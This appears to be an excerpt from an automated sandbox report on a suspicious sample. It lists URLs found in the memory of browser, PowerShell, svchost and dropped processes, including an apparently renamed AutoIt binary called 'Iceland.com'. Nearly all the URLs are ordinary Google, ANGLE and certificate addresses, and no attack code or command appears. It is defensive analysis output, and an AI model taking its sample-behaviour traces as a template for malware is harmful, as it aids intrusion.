Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6651
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6692
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6755
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6860
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6876
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6878
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6929
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6953
Source: chrome.exe, 00000018.00000002.2727110632.000054DC00B48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7036
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7047
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7172
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7279
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7370
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7406
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7488
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7553
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7556
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7724
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7760
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7761
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8162
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8215
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8229
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8280
Source: chrome.exe, 00000018.00000002.2722150471.000054DC0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://clients2.google.com/time/1/current
Source: chrome.exe, 00000018.00000002.2723581690.000054DC00670000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
Source: Tracking.11.dr, Iceland.com.12.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Tracking.11.dr, Iceland.com.12.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: svchost.exe, 00000019.00000002.3340409321.000002891D400000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: svchost.exe, 00000019.00000003.2634995492.000002891D1B0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.25.dr, edb.log.25.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: chrome.exe, 00000018.00000002.2721268748.000054DC0005F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://google.com/
Source: msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://issuetracker.google.com/200067929
Source: chrome.exe, 00000018.00000003.2644559836.000054DC010DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2644472845.000054DC010CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2644663261.000054DC00FC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2644831779.000054DC010F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://jsbin.com/temexa/4.
Source: yoda.exe, 0000000B.00000000.2255270447.0000000000409000.00000002.00000001.01000000.00000007.sdmp, yoda.exe, 0000000B.00000002.2268037420.0000000000409000.00000002.00000001.01000000.00000007.sdmp, yoda.exe.9.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000003.00000002.2106520526.000001A501977000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2123581484.000001A510071000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: Tracking.11.dr, Iceland.com.12.dr	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: Tracking.11.dr, Iceland.com.12.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Tracking.11.dr, Iceland.com.12.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: powershell.exe, 00000003.00000002.2106520526.000001A500229000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: chrome.exe, 00000018.00000003.2646237242.000054DC0040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2646002409.000054DC01018000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2644559836.000054DC010DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2644472845.000054DC010CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2645937843.000054DC0100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2645968432.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2644663261.000054DC00FC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2646350603.000054DC0120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2725617060.000054DC009F3000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2644831779.000054DC010F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2645910322.000054DC00D30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2644594327.000054DC0112C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2646465243.000054DC0126C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/AUTHORS.txt
Source: chrome.exe, 00000018.00000003.2646237242.000054DC0040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2646002409.000054DC01018000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2644559836.000054DC010DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2644472845.000054DC010CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2645937843.000054DC0100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2645968432.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2644663261.000054DC00FC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2646350603.000054DC0120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2725617060.000054DC009F3000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2644831779.000054DC010F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2645910322.000054DC00D30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2644594327.000054DC0112C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2646465243.000054DC0126C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
Source: chrome.exe, 00000018.00000003.2646237242.000054DC0040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2646002409.000054DC01018000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2644559836.000054DC010DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2644472845.000054DC010CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2645937843.000054DC0100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2645968432.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2644663261.000054DC00FC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2646350603.000054DC0120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2725617060.000054DC009F3000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2644831779.000054DC010F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2645910322.000054DC00D30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2644594327.000054DC0112C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2646465243.000054DC0126C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/LICENSE.txt
Source: chrome.exe, 00000018.00000003.2646237242.000054DC0040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2646002409.000054DC01018000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2644559836.000054DC010DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2644472845.000054DC010CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2645937843.000054DC0100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2645968432.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2644663261.000054DC00FC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2646350603.000054DC0120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2725617060.000054DC009F3000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2644831779.000054DC010F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2645910322.000054DC00D30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2644594327.000054DC0112C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2646465243.000054DC0126C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/PATENTS.txt
Source: chrome.exe, 00000018.00000003.2675147350.000054DC02294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://redirector.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNzI0QUFXNV9zT2RvdUw
Source: chrome.exe, 00000018.00000002.2725233523.000054DC00960000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://safebrowsing.googleusercontent.com/safebrowsing/clientreport/chrome-certs
Source: powershell.exe, 00000003.00000002.2106520526.000001A500932000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2106520526.000001A500229000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000003.00000002.2106520526.000001A500001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.2106520526.000001A500932000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2106520526.000001A500229000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: Tracking.11.dr, Iceland.com.12.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: chrome.exe, 00000018.00000002.2726026574.000054DC00A40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://unisolated.invalid/
Source: powershell.exe, 00000003.00000002.2106520526.000001A500229000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Iceland.com, 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmp, Iceland.com.12.dr, Dedicated.11.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: chrome.exe, 00000018.00000003.2675147350.000054DC02294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/update2/response
Source: chrome.exe, 00000018.00000002.2726269890.000054DC00A7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.gstatic.com/generate_204
Source: Iceland.com, 00000015.00000002.3340869698.00000000042A2000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728509553.000054DC00C98000.00000004.00000800.00020000.00000000.sdmp, 7G4EUK.21.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chrome.exe, 00000018.00000002.2722150471.000054DC0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accountcapabilities-pa.googleapis.com/
Source: chrome.exe, 00000018.00000002.2721453013.000054DC0008C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGet
Source: chrome.exe, 00000018.00000002.2721453013.000054DC0008C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGetT
Source: chrome.exe, 00000018.00000002.2723581690.000054DC00670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2722915743.000054DC0046C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2729235814.000054DC00D18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2723064659.000054DC004F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com
Source: chrome.exe, 00000018.00000002.2729235814.000054DC00D18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2721223946.000054DC0001C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/
Source: chrome.exe, 00000018.00000002.2722075742.000054DC001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/AddSession
Source: chrome.exe, 00000018.00000002.2722150471.000054DC0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo
Source: chrome.exe, 00000018.00000002.2722150471.000054DC0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/ListAccounts?json=standard
Source: chrome.exe, 00000018.00000002.2722075742.000054DC001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/Logout
Source: chrome.exe, 00000018.00000002.2722075742.000054DC001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/MergeSession
Source: chrome.exe, 00000018.00000002.2722075742.000054DC001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/OAuthLogin
Source: chrome.exe, 00000018.00000002.2722150471.000054DC0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/RotateBoundCookies
Source: chrome.exe, 00000018.00000002.2722267806.000054DC002A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport
Source: chrome.exe, 00000018.00000002.2722267806.000054DC002A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/allowlist
Source: chrome.exe, 00000018.00000002.2722267806.000054DC002A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/fine-allowlist
Source: chrome.exe, 00000018.00000002.2722150471.000054DC0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/chrome/blank.html
